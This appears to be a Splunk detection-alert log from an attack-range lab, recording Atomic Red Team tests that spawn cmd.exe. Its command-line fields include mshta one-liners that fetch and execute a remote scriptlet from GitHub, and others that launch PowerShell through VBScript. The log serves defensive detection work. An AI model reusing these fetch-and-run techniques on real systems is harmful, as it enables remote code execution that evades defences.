1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", original_file_name="Cmd.Exe", parent_process="hh.exe  C:\\AtomicRedTeam\\atomics\\T1218.001\\src\\T1218.001.chm", parent_process_id="528", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="6216", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", original_file_name="Cmd.Exe", parent_process="hh.exe  C:\\AtomicRedTeam\\atomics\\T1218.001\\src\\T1218.001.chm", parent_process_id="528", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="6216", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", original_file_name="unknown", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x210", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="0x1848", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:25:08", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:25:08", original_file_name="unknown", parent_process="C:\\Windows\\hh.exe", parent_process_id="0x210", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="0x1848", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:42", original_file_name="unknown", parent_process="C:\\Windows\\System32\\mshta.exe", parent_process_id="0x1154", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="0x950", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:42", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:42", original_file_name="unknown", parent_process="C:\\Windows\\System32\\mshta.exe", parent_process_id="0x1154", process="\"C:\\Windows\\System32\\cmd.exe\" /c calc.exe", process_id="0x950", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:34:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:34:04", original_file_name="unknown", parent_process="C:\\Windows\\System32\\cmd.exe", parent_process_id="0x1ec", process="C:\\Windows\\system32\\cmd.exe /c reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH", process_id="0x1018", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:34:04", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:34:04", original_file_name="unknown", parent_process="C:\\Windows\\System32\\cmd.exe", parent_process_id="0x1ec", process="C:\\Windows\\system32\\cmd.exe /c reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH", process_id="0x1018", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\"", process_id="0x1a20", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:36", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:36", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\"", process_id="0x1a20", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"mshta.exe \"about:<hta:application><script language=\"VBScript\">Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))</script>'\"\"", process_id="0x1e58", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:32:03", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:32:03", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"mshta.exe \"about:<hta:application><script language=\"VBScript\">Close(Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run%20\"\"powershell.exe%20-nop%20-Command%20Write-Host%20Hello,%20MSHTA!;Start-Sleep%20-Seconds%205\"\"\"))</script>'\"\"", process_id="0x1e58", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="win-host-mhaag-attack-range-117", risk_object_type="system", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
1657741992, search_name="ESCU - CMD Carry Out String Command Parameter - Rule", analyticstories="Data Destruction", analyticstories="Hermetic Wiper", analyticstories="IcedID", analyticstories="Living Off The Land", analyticstories="Log4Shell CVE-2021-44228", analyticstories="WhisperGate", annotations="{\"analytic_story\": [\"Data Destruction\", \"IcedID\", \"Log4Shell CVE-2021-44228\", \"WhisperGate\", \"Hermetic Wiper\", \"Living Off The Land\"], \"confidence\": 50, \"context\": [\"Source:Endpoint\", \"Stage:Execution\"], \"cve\": [\"CVE-2021-44228\"], \"impact\": 60, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059.003\", \"T1059\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"user\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Data Destruction", annotations.analytic_story="IcedID", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.analytic_story="WhisperGate", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Living Off The Land", annotations.context="Source:Endpoint", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059.003", annotations.mitre_attack="T1059", dest="win-host-mhaag-attack-range-117", firstTime="2022-07-13T18:31:40", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-07-13T18:31:40", original_file_name="unknown", parent_process="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", parent_process_id="0xbf0", process="C:\\Windows\\System32\\cmd.exe /c \"mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file C:\\AtomicRedTeam\\atomics\\T1218.005\\src\\powershell.ps1\"\":close\")\"", process_id="0xc9c", process_name="cmd.exe", risk_message="An instance of $parent_process_name$ spawning cmd.exe was identified on endpoint win-host-mhaag-attack-range-117 by user Administrator attempting spawn a new process.", risk_object="Administrator", risk_object_type="user", risk_score="30.0", savedsearch_description="The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it.", user="Administrator"
